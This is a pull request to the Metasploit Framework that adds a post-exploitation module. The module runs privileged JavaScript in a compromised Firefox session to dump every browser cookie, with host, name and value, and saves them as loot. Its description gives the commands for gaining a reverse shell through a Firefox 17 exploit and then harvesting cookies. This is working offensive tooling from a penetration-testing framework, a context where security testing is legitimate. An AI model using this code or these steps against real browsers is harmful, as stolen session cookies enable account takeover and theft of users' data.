### PR TITLE
Add cookie gathering post module for FF privileged sessions.

### DIFF
--- a/modules/post/firefox/gather/cookies.rb
+++ b/modules/post/firefox/gather/cookies.rb
@@ -38,7 +38,7 @@ class Metasploit3 < Msf::Post
     ], self.class)
   end
 
-  def exploit
+  def run
     print_status "Running the privileged javascript..."
     session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
     results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])

--- a/modules/post/firefox/gather/cookies.rb
+++ b/modules/post/firefox/gather/cookies.rb
@@ -1,0 +1,77 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'json'
+require 'msf/core'
+require 'msf/core/payload/firefox'
+
+class Metasploit3 < Msf::Post
+
+  include Msf::Payload::Firefox
+  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Firefox Gather Cookies from Privileged Javascript Shell',
+      'Description'   => %q{
+        This module allows collection of cookies from a Firefox Privileged Javascript Shell.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [ 'joev' ],
+      'Platform'      => [ 'firefox' ],
+      'DisclosureDate' => 'Mar 26 2014',
+      'Targets'       => [
+        [
+          'Native Payload', {
+            'Platform' => %w{ linux osx win unix },
+            'Arch'     => ARCH_ALL
+          }
+        ]
+      ],
+      'DefaultTarget' => 0
+    ))
+
+    register_options([
+      OptInt.new('TIMEOUT', [true, "Maximum time (seconds) to wait for a response", 90])
+    ], self.class)
+  end
+
+  def exploit
+    print_status "Running the privileged javascript..."
+    session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
+    results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
+    if results.present?
+      begin
+        cookies = JSON.parse(results)
+        file = store_loot("firefox.cookies.json", "text/json", rhost, results)
+        print_good("Saved #{cookies.length} cookies to #{file}")
+      rescue JSON::ParserError => e
+        print_warning(results)
+      end
+    end
+  end
+
+  def js_payload
+    %Q|
+      (function(send){
+        try {
+          var cookieManager = Components.classes["@mozilla.org/cookiemanager;1"]
+                        .getService(Components.interfaces.nsICookieManager);
+          var cookies = [];
+          var iter = cookieManager.enumerator;
+          while (iter.hasMoreElements()){
+            var cookie = iter.getNext();
+            if (cookie instanceof Components.interfaces.nsICookie){
+              cookies.push({host:cookie.host, name:cookie.name, value:cookie.value})
+            }
+          }
+          send(JSON.stringify(cookies));
+        } catch (e) {
+          send(e);
+        }
+      })(send);
+    |.strip
+  end
+end

--- a/modules/post/firefox/gather/cookies.rb
+++ b/modules/post/firefox/gather/cookies.rb
@@ -20,17 +20,7 @@ class Metasploit3 < Msf::Post
       },
       'License'       => MSF_LICENSE,
       'Author'        => [ 'joev' ],
-      'Platform'      => [ 'firefox' ],
-      'DisclosureDate' => 'Mar 26 2014',
-      'Targets'       => [
-        [
-          'Native Payload', {
-            'Platform' => %w{ linux osx win unix },
-            'Arch'     => ARCH_ALL
-          }
-        ]
-      ],
-      'DefaultTarget' => 0
+      'DisclosureDate' => 'Mar 26 2014'
     ))
 
     register_options([


### PR DESCRIPTION
Verification:
- [x] Get a shell on firefox 17 (browse to http://google.com first to get some cookies):

```
msf> use exploit/multi/browser/firefox_svg_plugin
msf> set payload firefox/shell_reverse_tcp
msf> set LHOST 0.0.0.0
msf> run
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:59457) at 2014-03-26 13:51:32 -0500
```
- [ ] Run the `post/firefox/gather/cookies` module against the session, ensure you collect some cookies:

```
msf> use post/firefox/gather/cookies
msf> set SESSION 1
msf> run
[+] Saved 26 cookies to ....
```
